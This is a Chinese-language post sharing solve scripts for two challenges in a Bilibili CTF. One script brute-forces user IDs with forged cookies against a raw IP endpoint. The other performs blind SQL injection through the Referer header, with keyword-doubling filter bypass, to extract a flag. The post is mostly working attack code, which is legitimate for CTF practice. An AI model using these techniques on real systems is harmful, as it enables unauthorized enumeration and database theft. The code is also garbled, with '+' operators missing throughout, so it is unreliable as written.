分享一下B站CTF的过关脚本

Night

第五题的思路是暴力破解UID，然后发送get请求，脚本如下

from bs4 import  BeautifulSoup
from urllib import  parse
import threading
import requests
sess = input('请输入您的cookie中的session项目')
for i in range(100336889,100336889 40000):
    session = requests.session()
    session.cookies.set('role', 'eyJ1aWQiOiIxOTM0Mjg3OCJ9.X5Pt0Q.IBUmdFKzPIrQdrZxXSMPShfYCd8')
    session.cookies.set('session', sess)
    response = session.get("http://45.113.201.36/api/ctf/5?uid=" str(i))
    response.encoding = 'UTF-8'
    try:
        text = response.json()
        if text['code'] != '403':
            print('---------------------------')
            print(text)
            print('uid= ', i)
            print('---------------------------')
    except Exception:
        if '404 Not Found' not in response.text:
            print('---------------------------')
            print(response.text)
            print('uid = ', i)
            print('---------------------------')
        else:
            print('wrong: ' str(i))
    response.close()

第六题的注入点为referer，然后编写脚本对referer进行注入，脚本如下：

import requests
url='http://120.92.151.189/blog/single.php?id=1'
flag=''
for i in range(1,100):
    left=33
    right=128

    while right-left!=1:
        mid=(left right)//2
        payload="0123'^if(substr((selselectect flag from flag),{i},1)>binary {mid},(selecselectt 1 ~0),0) ununionion selecselectt 1,2#".format(i=i,mid=hex(mid))
        headers={
        'Referer':payload
        }
        r=requests.get(url=url,headers=headers)
        if len(r.text) == 5596:
            left=mid
        else:
            right=mid
    flag =chr(right)
    print (flag)